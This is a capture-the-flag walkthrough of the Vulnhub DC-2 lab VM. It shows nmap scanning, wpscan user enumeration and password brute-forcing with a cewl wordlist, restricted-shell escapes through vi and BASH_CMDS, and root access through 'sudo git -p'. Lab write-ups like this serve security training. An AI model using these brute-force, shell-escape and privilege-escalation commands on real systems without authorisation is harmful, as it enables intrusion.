DC-2
青 叶

DC-2

Notice: This essay was written in English.

The file I downloaded from Vulnhub didn’t appear some network problem on my VMWare, but if you got some problems with the network, please view this essay:Fix Network Problem In Vulnhub Virtual Machine

FLAG 1

use nmap to scan for some information:

1
nmap -sC -sV -A -p- 192.168.145.135 -T5 -oN nmap

and this is my result:

image

We can ensure that there are web services and SSH services on the server.

Let’s go on.

I use browser to view that website, but unfortunately, it will redirect to http://dc-2/.

Then I edit the /etc/hosts file to make this site work, and here is my hosts file:

image

Now, let us reopen the website, and it works.

Got Flag1 easily:

image

FLAG 2

Through the prompt of FLAG1, I use cewl to generate a wordlist to brute-force.

1
cewl http://dc-2/ -w wordlist

image

Now I get the wordlist, then I use wpscan:

1
wpscan --url http://dc-2/

I got some information useless.

I try to use wpscan to enumerate the user:

1
wpscan --url http://dc-2/ -e u

And yes, I got it:

image

Then I use wpscan to brute-force password:

1
wpscan --url http://dc-2/ -P wordlist

And I got :

image

Well done, but how can I log in?

I use dirb to scan the web path:

1
dirb http://192.168.145.135

Then I found this path:

image

It redirects to /wp-login.php

I log in as user jerry, and got FLAG2:

image

FLAG 3

Through the prompt of FLAG2, I guess another entry point is SSH.

I try to connect SSH service as user jerry but failed, fortunately, user tom could.

Because of the limitation of rbash, I could not execute cat command:

image

Then I use command export to see what PATH is and use ls to list all the commands:

image

Well, less is available, nice !

Let me see the FLAG 3:

1
less flag3.txt

image

FLAG 4

So, I need to su jerry.

I try to su jerry using vi editor:

bash
1
2
:set shell=/bin/bash
:shell

Then we export /bin path to PATH var:

1
export PATH=$PATH:/bin

Then use su to change the user(password is in the result of wpscan):

1
su jerry

image

Another method to escape rbash :

1
2
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin

image

Got FLAG 4:

image

FLAG 5

I use sudo -l to check the privilege of user jerry:

1
sudo -l

image

Well, command git could run in root without password!

I google some help about git, and I found argument -p, and git would use more to display the information, so :

1
sudo git -p help -a

Then execute /bin/bash in more:

1
!/bin/bash

image

And we got root privilege:

image

Get Final Flag:

image